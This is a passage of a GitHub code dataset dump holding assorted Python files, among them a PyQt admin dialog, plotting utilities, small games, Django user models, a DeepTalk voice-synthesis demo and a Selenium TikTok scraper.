\"dataset.json\"))","repo_name":"MIC-DKFZ/MultiTalent","sub_path":"nnunet/dataset_conversion/Task018_PelvicOrganSegmentation.py","file_name":"Task018_PelvicOrganSegmentation.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"77"} +{"seq_id":"39203774139","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport sys, time, os\nfrom PyQt4 import QtGui, QtCore\n\n# Compiled ui classes\nfrom adminUi import Ui_AdminWindow\n\n# Admin Item Window\nfrom adminItemWindow import *\n\n# Admin Statistics Window\nfrom adminStatsWindow import *\n\nclass AdminWindow(QtGui.QDialog):\n def __init__(self, parent=None):\n QtGui.QDialog.__init__(self, parent, QtCore.Qt.Window)\n self.ui=Ui_AdminWindow()\n self.ui.setupUi(self)\n self.setModal(True)\n self.adminItemWindow = AdminItemWindow(self)\n self.adminStatsWindow = AdminStatsWindow(self)\n self.ui.pushBack.clicked.connect(self.pushBack)\n self.ui.pushAdmin.clicked.connect(self.pushAdmin)\n self.ui.pushStats.clicked.connect(self.pushStats)\n\n def show(self):\n QtGui.QDialog.show(self)\n self.setWindowState(QtCore.Qt.Fullscreen)\n\n def close(self):\n self.adminItemWindow.close()\n self.adminStatsWindow.close()\n QtGui.QDialog.close(self)\n\n def pushBack(self):\n self.reject()\n\n def pushAdmin(self):\n self.adminItemWindow.exec_()\n self.raise_()\n self.activateWindow()\n\n def pushStats(self):\n # Workaround for Qt bug in AdminStatsWindow - QFormLayouts can not be reset properly\n self.adminStatsWindow.deleteLater()\n self.adminStatsWindow.close()\n self.adminStatsWindow = AdminStatsWindow(self)\n self.adminStatsWindow.exec_()\n self.raise_()\n self.activateWindow()\n","repo_name":"fsiwi-hka/coffeesale","sub_path":"adminWindow.py","file_name":"adminWindow.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"6756768253","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 06/11/18\n\n@author: Maurizio Ferrari Dacrema\n\"\"\"\n\n\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\n\nimport itertools, os\n\n\ndef plot_algs_at_different_cutoffs(evaluator, folder_path,\n recommender1_object, recommender1_name,\n recommender_dict_name_to_object):\n\n \"\"\"\n\n :param evaluator:\n :param cutoff_list:\n :param folder_path:\n :param recommender_dict_name_to_object: Contains a dictionary [alg_lable]-> recommender_object\n :return:\n \"\"\"\n\n # If directory does not exist, create\n if not os.path.exists(folder_path):\n os.makedirs(folder_path)\n\n\n\n assert recommender1_name not in recommender_dict_name_to_object, \"This function requires the recommender1_name NOT to be in recommender_dict_name_to_object\"\n\n recommender_dict_name_to_object[recommender1_name] = recommender1_object\n\n\n recommender_dict_name_to_result_dict = {}\n metric_list = None\n cutoff_list = None\n\n\n for recommender_name in recommender_dict_name_to_object.keys():\n\n recommender_object = recommender_dict_name_to_object[recommender_name]\n\n results_dict, results_dict_string = evaluator.evaluateRecommender(recommender_object)\n\n logFile = open(folder_path + recommender_name + \"_all_cutoffs.txt\", \"a\")\n logFile.write(results_dict_string)\n logFile.close()\n\n print(\"Results for {}: \\n{}\".format(recommender_name, results_dict_string))\n\n recommender_dict_name_to_result_dict[recommender_name] = results_dict\n\n if metric_list is None:\n cutoff_list = list(results_dict.keys())\n metric_list = list(results_dict[cutoff_list[0]].keys())\n\n\n\n\n\n\n import pickle\n\n pickle.dump(recommender_dict_name_to_result_dict,\n open(folder_path + \"recommender_dict_name_to_result_dict\", \"wb\"),\n protocol=pickle.HIGHEST_PROTOCOL)\n\n\n\n\n for recommender2_name in recommender_dict_name_to_object.keys():\n\n if recommender2_name == recommender1_name:\n continue\n\n results_dict_recommender1 = recommender_dict_name_to_result_dict[recommender1_name]\n results_dict_recommender2 = recommender_dict_name_to_result_dict[recommender2_name]\n\n\n for metric_to_plot in metric_list:\n\n results_dict_recommender1_x_values = [results_dict_recommender1[cutoff][metric_to_plot] for cutoff in cutoff_list]\n results_dict_recommender2_x_values = [results_dict_recommender2[cutoff][metric_to_plot] for cutoff in cutoff_list]\n\n\n\n # Turn interactive plotting off\n plt.ioff()\n\n # Ensure it works even on SSH\n plt.switch_backend('agg')\n\n plt.xlabel('Cutoff value')\n plt.ylabel(\"{} value\".format(metric_to_plot))\n plt.title(\"Metric value for different cutoff values\")\n\n x_tick = cutoff_list\n\n marker_list = [\".\", \",\", \"o\", \"v\", \"^\", \"<\", \">\", \"1\", \"2\", \"3\", \"4\", \"8\", \"s\", \"p\", \"P\", \"*\", \"h\", \"H\", \"+\", \"x\", \"X\", \"D\", \"d\"]\n marker_iterator_local = itertools.cycle(marker_list)\n\n\n plt.plot(x_tick, results_dict_recommender1_x_values, linewidth=3, label = recommender1_name,\n linestyle = \"-\", marker = marker_iterator_local.__next__())\n\n plt.plot(x_tick, results_dict_recommender2_x_values, linewidth=3, label = recommender2_name,\n linestyle = \"-\", marker = marker_iterator_local.__next__())\n\n plt.legend()\n\n plt.savefig(folder_path + \"Metric value for different cutoff values_{}_{}_{}\".format(recommender1_name, recommender2_name, metric_to_plot))\n\n plt.close()\n\n\n\n\n\n","repo_name":"jiajunhua/MaurizioFD-RecSys2019_DeepLearning_Evaluation","sub_path":"Utils/plot_algs_at_different_cutoffs.py","file_name":"plot_algs_at_different_cutoffs.py","file_ext":"py","file_size_in_byte":3759,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"9222252716","text":"from turtle import Turtle\nimport random\nCOLORS = [\"red\", \"orange\", \"yellow\", \"green\", \"blue\", \"purple\"]\nSTARTING_MOVE_DISTANCE = 5\nMOVE_INCREMENT = 10\n\n\nclass CarManager:\n def __init__(self):\n super().__init__()\n self.all_cars = []\n self.car_speed = STARTING_MOVE_DISTANCE\n \n \n\n def create(self):\n \"\"\"Create car\n \"\"\"\n \n \n random_chance = random.randint(1,6)\n if random_chance == 1: #Create car at every time the while loop as been run 6 times\n new_car = Turtle(\"square\")\n new_car.shapesize(stretch_wid=1, stretch_len=2)\n new_car.penup()\n random_no = random.randint(0, len(COLORS)-1)\n random_ycor = random.randint(-250, 250)\n new_car.color(COLORS[random_no])\n new_car.goto(300, random_ycor)\n new_car.setheading(180)\n self.all_cars.append(new_car)\n \n \n \n\n def move_car(self):\n for car in self.all_cars:\n global STARTING_MOVE_DISTANCE\n car.forward(self.car_speed)\n \n \n def increase_speed (self):\n self.car_speed += MOVE_INCREMENT\n \n","repo_name":"wanicedude/Turtle--Crossing","sub_path":"car_manager.py","file_name":"car_manager.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21859870086","text":"import unittest\nfrom unittest.mock import patch, MagicMock\n\nfrom rest.CommonRequest import CommonRequestCall\nfrom rest.WebsiteRequest import WebsiteRequest\n\ncrawlerRest = WebsiteRequest()\ncommonRestAPi = ()\n\nBASE_URL = 'https:mock-uri'\n\n\nclass CommonRestApiTestCase(unittest.TestCase):\n\n @patch('urllib.request.urlopen')\n def test_rest_happy_path(self, mock_urlopen):\n mock_ = MagicMock()\n mock_.getcode.return_value = 200\n mock_.read.return_value = 'contents'\n mock_urlopen.return_value = mock_\n request_data = crawlerRest.get_properties_of_area(BASE_URL, 'CV1', 2)\n self.assertEqual(request_data, \"contents\")\n\n @patch('urllib.request.urlopen')\n def test_rest_handle_500_exception(self, mock_urlopen):\n mock_ = MagicMock()\n mock_.getcode.return_value = 500\n mock_.read.return_value = 'unavailable'\n mock_urlopen.return_value = mock_\n request_data = crawlerRest.get_properties_of_area(BASE_URL, 'CV1', 2)\n self.assertEqual(request_data, \"unavailable\")\n","repo_name":"manra399/scraper_temp","sub_path":"unit_tests/rest/crawler_rest_test_case.py","file_name":"crawler_rest_test_case.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"682966182","text":"import cv2\nimport numpy as np\n\nfrom os import listdir\nfrom os.path import isdir, isfile, join\n\n\nclass DataProcessor:\n\n @staticmethod\n def read_image_data(foldername, test_dataset=False):\n frames_dict = {}\n internal_folders = [f for f in listdir(foldername) if isdir(join(foldername, f))]\n count = 0\n for internal_folder in internal_folders:\n frames_files = [f for f in listdir(join(foldername, internal_folder)) if\n isfile(join(foldername, join(internal_folder, f)))]\n image_list = []\n for frame in frames_files:\n file = join(foldername, join(internal_folder, frame))\n image_list.append(np.asarray(cv2.imread(file, 0)))\n frames_dict[internal_folder] = image_list\n\n count += 1\n\n if test_dataset:\n if count > 3:\n break\n\n return frames_dict\n\n @staticmethod\n def reshape_dataset(input_data, size):\n\n reshaped_data = []\n for row in [en_img.reshape(size[0], size[1]) for en_img in input_data]:\n reshaped_data.append(row[0])\n\n return reshaped_data\n\n @staticmethod\n def convert_to_model_dataformat(frames_dict, train_test):\n\n data = []\n data_label = []\n for key, image_array in frames_dict.items():\n data.extend(image_array)\n data_label.extend([str(train_test) + '_' + str(key) + '_' + str(idx + 1) for idx, val in\n enumerate(range(len(image_array)))])\n\n return np.asarray(data), data_label\n\n","repo_name":"razmik/visual-feature-extractors","sub_path":"computer-vision-domain/handcrafted/util/data_processor.py","file_name":"data_processor.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"37877854315","text":"\nfrom encoder.params_model import model_embedding_size as speaker_embedding_size\nfrom utils.argutils import print_args\nfrom synthesizer.inference import Synthesizer\nfrom encoder import inference as encoder\nfrom encoder import audio\nfrom vocoder import inference as vocoder\nimport numpy as np\nimport torch\nimport librosa\nfrom utils.sigproc import *\nimport torchvision.transforms as transforms\nfrom pathlib import Path\nimport demo_config as config\nimport re\nimport os\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = config.gpu_id\n\ndef fCNN_encoder(file_path, model_save_path, sampling_rate=8000, n_channels=1, duration = None, is_cmvn = False, normalize=True,):\n # Load model model_save_path\n from encoder.models import OneD_Triplet_fCNN as network\n model = network.cnn()\n model = torch.nn.DataParallel(model).cuda()\n checkpoint = torch.load(model_save_path)\n model.load_state_dict(checkpoint['state_dict'])\n model.eval()\n\n # Load audio from file_path\n win = np.hamming(int(sampling_rate*0.02))\n frame = get_frame_from_file(file_path, win=win, sr=sampling_rate, n_channels=n_channels, duration = duration, is_cmvn=is_cmvn)\n data = np.expand_dims(frame, axis=2)\n transform =transforms.Compose([transforms.ToTensor()])\n data = transform(data)\n data = data.unsqueeze(0)\n data = data.float()\n\n ## Evaluate the audio using the model\n x1, _ = model(data)\n x1_d = x1.data.cpu().float().numpy().flatten()\n embed_input = np.concatenate((x1_d, x1_d), axis=0)\n\n if(normalize):\n embed = embed_input / np.linalg.norm(embed_input)\n\n return embed\n\n\n\n\n\ndef OneD_Triplet_CNN_encoder(file_path, model_save_path, ftr_type = 'MFCC-LPC', sampling_rate=16000, n_channels=1, duration = 2.01, normalize=True,):\n # Load model model_save_path\n from encoder.models import OneD_Triplet_fCNN as network\n model = network.cnn()\n model = torch.nn.DataParallel(model).cuda()\n checkpoint = torch.load(model_save_path)\n model.load_state_dict(checkpoint['state_dict'])\n model.eval()\n\n # Load audio from file_path\n win = np.hamming(int(sampling_rate*0.02))\n inc = int(win.shape[0]/2)\n input_audio, sr = librosa.load(file_path, sr=sampling_rate)\n order = 20\n preemphasis = True\n includeDerivatives = True\n if ftr_type == 'MFCC-LPC':\n frame = get_mfcc_lpc_feature(input_audio, sampling_rate, order = order, preemphasis = preemphasis, includeDerivatives = includeDerivatives, win = win, inc = inc)\n data = frame\n transform =transforms.Compose([transforms.ToTensor()])\n data = transform(data)\n data = data.unsqueeze(0)\n data = data.float()\n\n ## Evaluate the audio using the model\n x1 = model(data)\n x1_d = x1.data.cpu().float().numpy().flatten()\n embed_input = np.concatenate((x1_d, x1_d), axis=0)\n if(normalize):\n embed = embed_input / np.linalg.norm(embed_input)\n\n return embed\n\n\ndef DeepTalk_encoder(file_path, model_save_path, module_name, preprocess=True, normalize=True, sampling_rate=8000, duration=None):\n\n encoder.load_model(model_save_path, module_name=module_name)\n\n if(preprocess):\n wav = Synthesizer.load_preprocess_wav(file_path)\n ref_audio = encoder.preprocess_wav(wav)\n else:\n ref_audio, sr = librosa.load(file_path, sr=sampling_rate)\n\n if(duration is not None):\n ref_audio = ref_audio[0:int(duration*sampling_rate)]\n\n embed, partial_embeds, _ = encoder.embed_utterance(ref_audio, using_partials=True, return_partials=True)\n\n if(normalize):\n embed = embed / np.linalg.norm(embed)\n\n return embed\n\n\ndef DeepTalk_synthesizer(encoder_embedding, output_text, model_save_path, low_mem = False):\n synthesizer = Synthesizer(model_save_path, low_mem=low_mem)\n texts = output_text\n texts = texts.split(\"\\n\")\n embeds = np.stack([encoder_embedding] * len(texts))\n specs = synthesizer.synthesize_spectrograms(texts, embeds)\n breaks = [spec.shape[1] for spec in specs]\n spec = np.concatenate(specs, axis=1)\n mel = spec\n\n return mel, breaks\n\ndef DeepTalk_vocoder(synthesized_mel, breaks, model_save_path, normalize=True):\n vocoder.load_model(model_save_path)\n no_action = lambda *args: None\n wav1 = vocoder.infer_waveform(synthesized_mel, progress_callback=no_action, normalize=normalize)\n\n # Add breaks\n b_ends = np.cumsum(np.array(breaks) * Synthesizer.hparams.hop_size)\n b_starts = np.concatenate(([0], b_ends[:-1]))\n wavs = [wav1[start:end] for start, end, in zip(b_starts, b_ends)]\n breaks = [np.zeros(int(0.15 * Synthesizer.sample_rate))] * len(breaks)\n wav1 = np.concatenate([i for w, b in zip(wavs, breaks) for i in (w, b)])\n wav1 = wav1 / np.abs(wav1).max() * 0.97\n return wav1\n\n\ndef run_DeepTalk_demo(ref_audio_path='samples/ref_VCTKp240.wav', output_text='Hello World',\nenc_model_fpath=config.enc_model_fpath, enc_module_name=config.enc_module_name,\nsyn_model_dir=config.syn_model_dir, voc_model_fpath=config.voc_model_fpath, key_embed=None):\n class hyperparameter:\n def __init__(self):\n\n self.enc_model_fpath = enc_model_fpath\n self.enc_module_name = enc_module_name\n self.syn_model_dir = syn_model_dir\n self.voc_model_fpath = voc_model_fpath\n\n self.enc_normalize = False\n self.voc_normalize = True\n self.low_mem = False # \"If True, the memory used by the synthesizer will be freed after each use. Adds large \"\n # \"overhead but allows to save some GPU memory for lower-end GPUs.\"\n self.no_sound = False # If True, audio won't be played.\n self.sampling_rate = 16000 ## 16000: For mel-spectrogram based methods; 8000: For fCNN base methods\n self.ref_audio_path = ref_audio_path\n self.output_text = output_text\n\n args = hyperparameter()\n\n ## Load trained models: Encoder, Synthesizer, and Vocoder\n # os.environ[\"CUDA_VISIBLE_DEVICES\"] = '0'\n encoder.load_model(args.enc_model_fpath, module_name=args.enc_module_name)\n synthesizer = Synthesizer(args.syn_model_dir, low_mem=args.low_mem)\n vocoder.load_model(args.voc_model_fpath)\n\n ## Encoding stage\n print('---------------------------------------------------------------')\n print('Stage 1/3: Encoder')\n print('---------------------------------------------------------------')\n wav = Synthesizer.load_preprocess_wav(args.ref_audio_path)\n ref_audio = encoder.preprocess_wav(wav)\n\n embed, partial_embeds, _ = encoder.embed_utterance(ref_audio, using_partials=True, return_partials=True, key_embed = key_embed)\n if(args.enc_normalize):\n embed = embed / np.linalg.norm(embed)\n\n if(embed.shape[0]==128):\n embed = np.concatenate((embed, embed), axis=0)\n\n\n ## Synthesizing stage\n print('---------------------------------------------------------------')\n print('Stage 2/3: Synthesizer')\n print('---------------------------------------------------------------')\n texts = args.output_text\n # texts = re.split(',|.',texts)\n texts = re.split(r'[,.]\\s*', texts)\n texts[:] = [x for x in texts if x]\n print(texts)\n # texts = texts.split(\"\\n\")\n # texts = texts.split(\".\")\n # texts = texts.split(\",\")\n embeds = np.stack([embed] * len(texts))\n specs = synthesizer.synthesize_spectrograms(texts, embeds)\n breaks = [spec.shape[1] for spec in specs]\n synthesized_mel = np.concatenate(specs, axis=1)\n\n ## Vocoding stage\n print('---------------------------------------------------------------')\n print('Stage 3/3: Vocoder')\n print('---------------------------------------------------------------')\n no_action = lambda *args: None\n wav1 = vocoder.infer_waveform(synthesized_mel, progress_callback=no_action, normalize=args.voc_normalize)\n # Add breaks\n b_ends = np.cumsum(np.array(breaks) * Synthesizer.hparams.hop_size)\n b_starts = np.concatenate(([0], b_ends[:-1]))\n wavs = [wav1[start:end] for start, end, in zip(b_starts, b_ends)]\n breaks = [np.zeros(int(0.15 * Synthesizer.sample_rate))] * len(breaks)\n wav1 = np.concatenate([i for w, b in zip(wavs, breaks) for i in (w, b)])\n synthesized_wav = wav1 / np.abs(wav1).max() * 0.97\n\n return synthesized_wav, Synthesizer.sample_rate, embed\n","repo_name":"iPRoBe-lab/DeepTalk","sub_path":"demo_functions.py","file_name":"demo_functions.py","file_ext":"py","file_size_in_byte":8284,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"77"} +{"seq_id":"5923540680","text":"import json\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\nfrom selenium import webdriver\nfrom selenium.common import exceptions\nfrom selenium.webdriver.chrome.service import Service\nimport datetime as dt\nfrom time import sleep\nimport sys\nimport os.path\nimport pandas as pd\nfrom typing import List, Dict, Tuple\nfrom tqdm import tqdm\n\n\nclass TikTuki():\n def __init__(self, username: str):\n self.driver = self.init_driver()\n self.username = username\n\n def init_driver(self) -> webdriver.Chrome:\n options = webdriver.ChromeOptions()\n options.set_capability(\"goog:loggingPrefs\", {\"performance\": \"ALL\", \"browser\": \"ALL\"})\n options.add_argument('--headless')\n options.add_argument('--no-sandbox')\n options.add_argument('--disable-dev-shm-usage')\n options.add_argument(\"window-size=1400,600\")\n options.add_argument(\"--incognito\")\n user_agent = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.50 Safari/537.36' \n options.add_argument(f'user-agent={user_agent}')\n\n return webdriver.Chrome(options=options)\n\n def scrape_page_source(self, html: str) -> Tuple[List[str], List[str]]:\n soup = BeautifulSoup(html, 'html.parser')\n\n videos_data = {}\n\n for anchor in soup.find_all('a', href=True):\n if anchor.has_attr('title'):\n videos_data[anchor['href']] = anchor['title']\n \n return videos_data \n\n def get_video_urls(self, full: bool) -> Dict[str, str]:\n browser = self.driver\n browser.get(f'https://www.tiktok.com/@{self.username}')\n print(f\"Scraping {self.username}'s profile\")\n \n # For a full profile scrape\n if full == True:\n # O feed do TikTok possui scroll infinito, ao que foi proposta a seguinte soluç��o\n # que tomo aplicada aqui:\n #https://github.com/KuanWeiBeCool/Choose-best-Sephora-Make-up-Products-With-A-Limited-Budget/blob/55d474f9441d0b6a1b71a44e5267b386b66b292b/Web%20Scrapping%20For%20Infinite%20Scrolling%20Websites%20Using%20Selenium.ipynb\n screen_height = browser.execute_script('return window.screen.height;')\n counter = 0\n\n while True:\n browser.execute_script(f'window.scrollTo(0, {screen_height * counter});')\n scroll_height = browser.execute_script('return document.body.scrollHeight;')\n sleep(3)\n counter += 1\n\n if (screen_height * counter) > scroll_height:\n break\n\n html = browser.page_source\n \n # For a parcial scrape (default)\n else:\n html = browser.page_source\n \n browser.quit() \n videos_dict = self.scrape_page_source(html)\n\n # Exit program if no videos were found\n if len(videos_dict) == 0:\n sys.exit('Empty or non-existent profile')\n \n print(f'Got {len(videos_dict)} videos')\n return videos_dict \n\n def get_post_metrics(self, video_urls: List[str]) -> Dict[str, int]:\n for url in tqdm(video_urls):\n response = requests.get(url)\n soup = BeautifulSoup(response.text, 'html.parser')\n\n post_data = {}\n metrics = soup.find_all('strong', attrs={'data-e2e': True})\n\n post_data['url'] = url\n\n try:\n post_data['desc'] = soup.find_all('span', attrs={'class': 'tiktok-j2a19r-SpanText efbd9f0'})[0].text\n \n for metric in metrics:\n post_data[metric['data-e2e']] = metric.text\n\n except:\n for key in ['like-count', 'comment-count', 'undefined-count', 'share-count']:\n post_data[key] = 0\n post_data['desc'] = 'Video not found'\n\n yield post_data\n \n def get_video_data(self, full: bool) -> List[Dict[str, int]]:\n video_urls = self.get_video_urls(full)\n post_metrics = self.get_post_metrics(video_urls.keys())\n output_list = []\n\n for i in post_metrics:\n output_list.append(i) \n\n return output_list\n","repo_name":"yuki-shi/tiktuki","sub_path":"tiktuki.py","file_name":"tiktuki.py","file_ext":"py","file_size_in_byte":3791,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"36266463677","text":"# load the class label\nfile_name = '/media/agent/eb0d0016-e15f-4a25-8c28-0ad31789f3cb/Scene/DEDUCE/scene_30_all.txt'\n\nclasses = list()\nwith open(file_name) as class_file:\n for line in class_file:\n cur_sn = line.split()[0].rsplit('/')[-1].strip().rsplit('_')[0]+'_'+line.split()[0].rsplit('/')[-1].strip().rsplit('_')[1]\n if not cur_sn in classes:\n classes.append(cur_sn)\nclasses = tuple(classes)\n\nfile = '/media/agent/eb0d0016-e15f-4a25-8c28-0ad31789f3cb/Scene/DEDUCE/download_classes.txt'\n\nclasses_2 = list()\nwith open(file) as class_file:\n for line in class_file:\n cur_sn = line.split()[0]\n classes_2.append(cur_sn)\nclasses_2 = tuple(classes_2)\n\nc = classes_2==classes\n\nimg_name = line.split()[0].rsplit('/')[-1].strip()\nsn_name = line.split()[0].rsplit('/')[-1].strip().rsplit('_')[0]+'_'+line.split()[0].rsplit('/')[-1].strip().rsplit('_')[1]\nprint(img_name)","repo_name":"LiuXiang199x/ScenceRecog","sub_path":"DEDUCE/read_sn.py","file_name":"read_sn.py","file_ext":"py","file_size_in_byte":907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42322170089","text":"import os\nfrom setuptools import setup\n\n\ndef read(fname):\n return open(os.path.join(os.path.dirname(__file__), fname)).read()\n\n\nsetup(\n name=\"pyconllu\",\n version=\"0.1.2\",\n author=\"Susana Sotelo\",\n author_email=\"susana.sotelo@linguarum.net\",\n description=(\n \"Package with classes to manage files in CoNLL-U format.\"),\n license=\"GPL\",\n packages=[\"pyconllu\"],\n long_description=read(\"README.rst\"),\n classifiers=[\n \"Development Status :: 4 - Beta\",\n \"Environment :: Console\",\n \"License :: OSI Approved :: GNU General Public License (GPL)\",\n \"Programming Language :: Python\",\n \"Topic :: Text Processing :: Linguistic\",\n ]\n)\n","repo_name":"social-datalab/pyconllu","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73097442807","text":"# Created by: Justin Bronson\n# Created on: Dec 2017\n# Created for: ICS3U\n# This class controls the lasers\n\nfrom scene import *\nimport math\nimport sound\nimport datetime\nfrom main_game import *\n\nclass Laser:\n \n sprite_scale= 1\n sprite_file= './assets/sprites/bullet.png'\n \n def __init__(self, x1arg, y1arg, x2arg, y2arg, xAngle):\n # Flight Boundary \n self.x1=x1arg\n self.y1=y1arg\n self.x2=x2arg\n self.y2=y2arg\n \n # Properties \n self.speed = 400\n self.x_velocity = float(0)\n self.y_velocity = float(0)\n self.max_distance = 500\n \n self.distance=0\n \n self.delete = False\n \n self.angle= xAngle + 90\n if self.angle> 360:\n self.angle-= 360\n \n self.sprite = None\n \n self.scale_x = math.cos(math.radians(self.angle))\n self.scale_y = math.sin(math.radians(self.angle)) \n self.x_velocity = self.speed * self.scale_x \n self.y_velocity = self.speed * self.scale_y \n \n def move(self):\n \n if self.sprite.scene == None:\n move_sprite= False\n else:\n move_sprite= True\n xpos = self.sprite.position[0] + self.x_velocity * self.sprite.scene.dt\n ypos = self.sprite.position[1] + self.y_velocity * self.sprite.scene.dt\n self.distance += self.speed * self.sprite.scene.dt\n \n #Should the ship move\n if self.sprite.position[0] < self.x1:\n #Ship has moved off screen\n xpos = self.x2\n ypos = self.sprite.position[1]\n self.sprite.remove_all_actions()\n self.sprite.run_action(Action.move_to(xpos, ypos, 0))\n move_sprite= False\n \n elif self.sprite.position[0] > self.x2:\n xpos = self.x1\n ypos = self.sprite.position[1]\n self.sprite.remove_all_actions()\n self.sprite.run_action(Action.move_to(xpos, ypos, 0))\n move_sprite= False\n \n if self.sprite.position[1] < self.y1:\n ypos = self.y2\n xpos = self.sprite.position[0]\n self.sprite.remove_all_actions()\n self.sprite.run_action(Action.move_to(xpos, ypos, 0))\n move_sprite= False\n \n elif self.sprite.position[1] > self.y2:\n ypos = self.y1\n xpos = self.sprite.position[0]\n self.sprite.remove_all_actions()\n self.sprite.run_action(Action.move_to(xpos, ypos, 0))\n move_sprite= False\n \n if move_sprite== True:\n self.sprite.remove_all_actions()\n self.sprite.run_action(Action.move_to(xpos, ypos, 0))\n \n if self.distance >= self.max_distance:\n self.sprite.remove_from_parent()\n self.delete = True\n \n def draw(self, parent, x , y):\n self.sprite = SpriteNode(self.sprite_file,\n parent = parent,\n position = Vector2(x,y),\n scale = self.sprite_scale)\n \n","repo_name":"MotherTeresaHS/ICS3U-2017-Group4","sub_path":"Asteroid Attack (Group 4)-3/laser.py","file_name":"laser.py","file_ext":"py","file_size_in_byte":3151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13879600417","text":"from django.contrib.auth import get_user_model\nfrom django.contrib.auth.models import AbstractUser\nfrom django.core.mail import send_mail\nfrom django.db.models import (\n SET_NULL,\n BooleanField,\n CharField,\n DateField,\n DateTimeField,\n ImageField,\n IntegerChoices,\n ManyToManyField,\n Model,\n OneToOneField,\n PositiveSmallIntegerField,\n)\nfrom django.utils.translation import gettext_lazy as _\n\n\ndef user_directory_path(instance, filename):\n return f\"user_{instance.user.id}/profile_pics/{filename}\"\n\n\nclass Role(Model):\n class UserType(IntegerChoices):\n REGULAR = 0, _(\"Regular User\")\n STUDENT = 1, _(\"Student\")\n TEACHER = 2, _(\"Teacher\")\n SECRETARY = 3, _(\"Secretary\")\n SUPERVISOR = 4, _(\"Supervisor\")\n ADMIN = 5, _(\"Administrator\")\n\n user_type = PositiveSmallIntegerField(\n choices=UserType.choices, default=UserType.REGULAR, primary_key=True\n )\n\n\nclass User(AbstractUser):\n roles = ManyToManyField(Role)\n middle_name = CharField(max_length=30, blank=True)\n date_of_birth = DateField(null=True, blank=True)\n\n @property\n def email_user(self, subject, message, from_email=None, **kwargs):\n \"\"\"Sends an email to this User.\"\"\"\n send_mail(subject, message, from_email, [self.email], **kwargs)\n\n\nclass Profile(Model):\n # file will be uploaded to MEDIA_ROOT/user_/\n user = OneToOneField(get_user_model(), on_delete=SET_NULL, null=True)\n date_created = DateTimeField(auto_now_add=True)\n date_modified = DateTimeField(auto_now=True)\n is_public = BooleanField(default=False)\n is_active = BooleanField(default=True)\n image = ImageField(default=\"default.webp\", upload_to=user_directory_path)\n # @cached_property\n # def friends(self):\n # pass\n\n\n# have rust task using celery or golang task to convert image files to webp.\n","repo_name":"wearypossum4770/jubilant-tasker","sub_path":"users/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10573151998","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Author: Matthias Guggenmos \n# 2021\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nimport os\n\n\ndef smooth(x, window_len=5, window='hanning'):\n if window == 'flat':\n w = np.ones(window_len, 'd')\n else:\n w = eval('np.'+window+'(window_len)')\n y = np.convolve(w/w.sum(), x, mode='valid')\n return y\n\n\ndef savefig(path, relative_to_home=False, bbox_inches='tight', pad_inches=0, dpi=300, **kwargs):\n mpl.rcParams['svg.fonttype'] = 'none'\n if relative_to_home:\n path = os.path.join(os.path.expanduser(\"~\"), path)\n plt.savefig(path, bbox_inches=bbox_inches, pad_inches=pad_inches, dpi=dpi, **kwargs)\n\n\ndef set_fontsize(label=None, xlabel=None, ylabel=None, tick=None, xtick=None, ytick=None, title=None, scheme=None):\n\n fig = plt.gcf()\n\n if scheme == 'default':\n label = 14\n tick = 12\n title = 16\n\n for ax in fig.axes:\n if xlabel is not None:\n ax.xaxis.label.set_size(xlabel)\n elif label is not None:\n ax.xaxis.label.set_size(label)\n if ylabel is not None:\n ax.yaxis.label.set_size(ylabel)\n elif label is not None:\n ax.yaxis.label.set_size(label)\n\n if xtick is not None:\n for ticklabel in (ax.get_xticklabels()):\n ticklabel.set_fontsize(xtick)\n elif tick is not None:\n for ticklabel in (ax.get_xticklabels()):\n ticklabel.set_fontsize(tick)\n if ytick is not None:\n for ticklabel in (ax.get_yticklabels()):\n ticklabel.set_fontsize(ytick)\n elif tick is not None:\n for ticklabel in (ax.get_yticklabels()):\n ticklabel.set_fontsize(tick)\n\n if title is not None:\n ax.title.set_fontsize(title)\n","repo_name":"m-guggenmos/metameasure","sub_path":"plot/plot_util.py","file_name":"plot_util.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4010975009","text":"from flask import Flask, render_template, request, send_file\nfrom forms import TextForm\nfrom bs4 import BeautifulSoup\nimport requests\nimport re\n\napp = Flask(__name__)\n\napp.config['SECRET_KEY'] = 'bf41cdb8be7df3e599e80a7e747bb926'\n\n@app.route(\"/\", methods=['POST', 'GET'])\ndef add_Text():\n\n form = TextForm()\n text = request.form.get(\"text\", \"\")\n\n with open('download.txt', 'w', encoding='utf-8') as fo:\n 